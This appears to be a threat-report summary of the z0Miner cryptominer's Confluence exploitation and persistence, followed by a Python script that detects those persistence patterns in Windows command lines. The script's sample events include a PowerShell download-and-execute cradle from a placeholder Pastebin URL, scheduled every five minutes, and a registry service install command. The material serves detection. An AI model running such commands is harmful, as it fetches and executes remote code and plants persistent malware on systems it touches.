Researchers at Trend Micro published a report on Tuesday that z0Miner, a prolific malware threat that abuses compromised systems to mine cryptocurrency, has started using the recently disclosed vulnerability CVE-2021-26084 to exploit Atlassian Confluence servers that have not had the latest security patch installed. Once a vulnerable server is exploited, z0Miner downloads a PowerShell script, batch files, and a DLL file from servers at IP addresses 188.8.131.52 (Netherlands) and 184.108.40.206 (South Korea). The malware uses “reg add” commands in a Windows batch file to directly manipulate the Windows registry of the victim server and install a new service named “Hyper-V Guest Virtualization Service”; the service installation ensures that the malware runs whenever the server is restarted. Another of the malware’s scripts uses the “schtasks /create” command to install a service named “.NET Framework NGEN v4.0.30319 32” that uses PowerShell to download a malicious script hosted on Pastebin.com and execute it every five minutes. The Pastebin security team has already removed the paste hosting the malicious script.
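The two persistence mechanisms described above (a service written directly under the Services registry key, and a scheduled task that launches a PowerShell download cradle on a short interval) are easy to hunt for in process-creation telemetry. The following triage script is an added example and is not Trend Micro's tooling or anything from the report; it runs over a handful of constructed command lines (the Pastebin URL is a placeholder, and the registry key name HvGuestSvc is invented), and the tag names and severity scheme are this example's own assumptions. It flags the generic patterns as well as the two display names quoted in the report, so it also catches the same technique under a different name.

```python
"""Triage Windows process-creation command lines for the persistence
patterns described in the z0Miner report: ``reg add`` writes under the
Services key, and ``schtasks /create`` tasks whose action is a PowerShell
download cradle.  Added example, not Trend Micro's tooling; the sample
events below are constructed and the tag names are assumptions."""
import re
from dataclasses import dataclass, field

# Service / task display names quoted in the report.
KNOWN_NAMES = (
    "Hyper-V Guest Virtualization Service",
    ".NET Framework NGEN v4.0.30319 32",
)

# "reg add" targeting a key under HKLM\SYSTEM\CurrentControlSet\Services
RE_REG_SERVICE = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?'
    r'(HK(?:LM|EY_LOCAL_MACHINE)\\SYSTEM\\CurrentControlSet\\Services\\[^"\s]+)',
    re.I,
)
RE_SCHTASKS = re.compile(r"schtasks(?:\.exe)?\s+/create\b", re.I)
RE_MINUTES = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
RE_POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# Common PowerShell download primitives plus the paste site named in the report.
RE_DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|pastebin\.com",
    re.I,
)

HIGH_TAGS = {
    "registry_service_persistence",
    "task_runs_powershell_download_cradle",
    "z0miner_name_match",
}


@dataclass
class Finding:
    line: str
    tags: list = field(default_factory=list)
    detail: dict = field(default_factory=dict)


def classify(cmdline: str) -> Finding:
    """Return a Finding with zero or more tags for one command line."""
    f = Finding(cmdline)
    m = RE_REG_SERVICE.search(cmdline)
    if m:
        f.tags.append("registry_service_persistence")
        f.detail["service_key"] = m.group(1)
    if RE_SCHTASKS.search(cmdline):
        f.tags.append("scheduled_task_created")
        mm = RE_MINUTES.search(cmdline)
        if mm:
            f.detail["interval_minutes"] = int(mm.group(1))
        if RE_POWERSHELL.search(cmdline) and RE_DOWNLOAD.search(cmdline):
            f.tags.append("task_runs_powershell_download_cradle")
    lowered = cmdline.lower()
    for name in KNOWN_NAMES:
        if name.lower() in lowered:
            f.tags.append("z0miner_name_match")
            f.detail["name"] = name
            break
    return f


def severity(f: Finding) -> str:
    """'high' for the z0Miner-style patterns, 'low' for a bare task creation."""
    if not f.tags:
        return "none"
    return "high" if HIGH_TAGS.intersection(f.tags) else "low"


def triage(events):
    """Classify every event and keep only those that matched something."""
    return [f for f in (classify(e) for e in events) if f.tags]


# Constructed sample telemetry (not real log data); index 0 and 1 mimic the
# report, index 2 is a benign task, index 3 and 4 are unrelated noise.
SAMPLE_EVENTS = [
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Services\HvGuestSvc" /v DisplayName /t REG_SZ /d "Hyper-V Guest Virtualization Service" /f',
    'schtasks /create /tn ".NET Framework NGEN v4.0.30319 32" /sc minute /mo 5 '
    '/tr "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/PLACEHOLDER\'))" /f',
    'schtasks /create /tn "Nightly Backup" /sc daily /st 02:00 /tr "C:\\Tools\\backup.exe"',
    r'reg add HKCU\Software\ExampleApp /v FirstRun /t REG_DWORD /d 1 /f',
    r'notepad.exe C:\Users\alice\notes.txt',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(severity(finding).upper(), finding.tags, finding.detail)
```

In a real deployment the command lines would come from Sysmon Event ID 1 or Windows Security Event 4688, and the `interval_minutes` detail is worth alerting on by itself: legitimate tasks rarely re-run a PowerShell one-liner every few minutes.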